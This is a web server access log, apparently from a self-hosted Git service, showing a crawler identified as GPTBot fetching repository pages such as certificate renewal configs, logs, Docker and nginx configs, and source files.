"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:15:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 74.7.227.38] [Length 11690] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:15:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 74.7.227.38] [Length 11664] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:15:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 74.7.227.38] [Length 11693] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:15:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 74.7.227.38] [Length 11713] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:15:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:15:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 74.7.227.38] [Length 10995] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:15:33:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/App.tsx" +[17/Feb/2026:15:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/App.tsx" +[17/Feb/2026:15:33:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/App.tsx" +[17/Feb/2026:15:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/App.tsx" +[17/Feb/2026:15:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:15:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 74.7.227.38] [Length 11719] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:15:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:15:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 74.7.227.38] [Length 11689] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:15:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:15:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:15:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 74.7.227.38] [Length 10954] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:15:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:15:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:15:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 74.7.227.38] [Length 11692] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:15:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:15:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:15:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 74.7.227.38] [Length 11720] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:15:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 74.7.227.38] [Length 11721] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:15:33:25 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" +[17/Feb/2026:15:33:25 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" +[17/Feb/2026:15:33:26 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" +[17/Feb/2026:15:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh?display=source" [Client 74.7.227.38] [Length 14901] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" +[17/Feb/2026:15:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh?display=source" [Client 74.7.227.38] [Length 14933] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" +[17/Feb/2026:15:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10856] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" +[17/Feb/2026:15:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12603] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" +[17/Feb/2026:15:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" +[17/Feb/2026:15:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf?display=source" [Client 74.7.227.38] [Length 11669] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" +[17/Feb/2026:15:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" +[17/Feb/2026:15:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12594] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" +[17/Feb/2026:15:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" +[17/Feb/2026:15:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" +[17/Feb/2026:15:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10834] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" +[17/Feb/2026:15:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" +[17/Feb/2026:15:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14392] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:15:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" +[17/Feb/2026:15:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py?display=source" [Client 74.7.227.38] [Length 12962] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" +[17/Feb/2026:15:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" +[17/Feb/2026:15:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16085] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" +[17/Feb/2026:15:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2?display=source" [Client 74.7.227.38] [Length 20239] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" +[17/Feb/2026:15:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" +[17/Feb/2026:15:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good?display=source" [Client 74.7.227.38] [Length 20260] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" +[17/Feb/2026:15:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" +[17/Feb/2026:15:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:15:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:15:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 74.7.227.38] [Length 10999] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:15:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 74.7.227.38] [Length 11716] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:15:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:15:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr 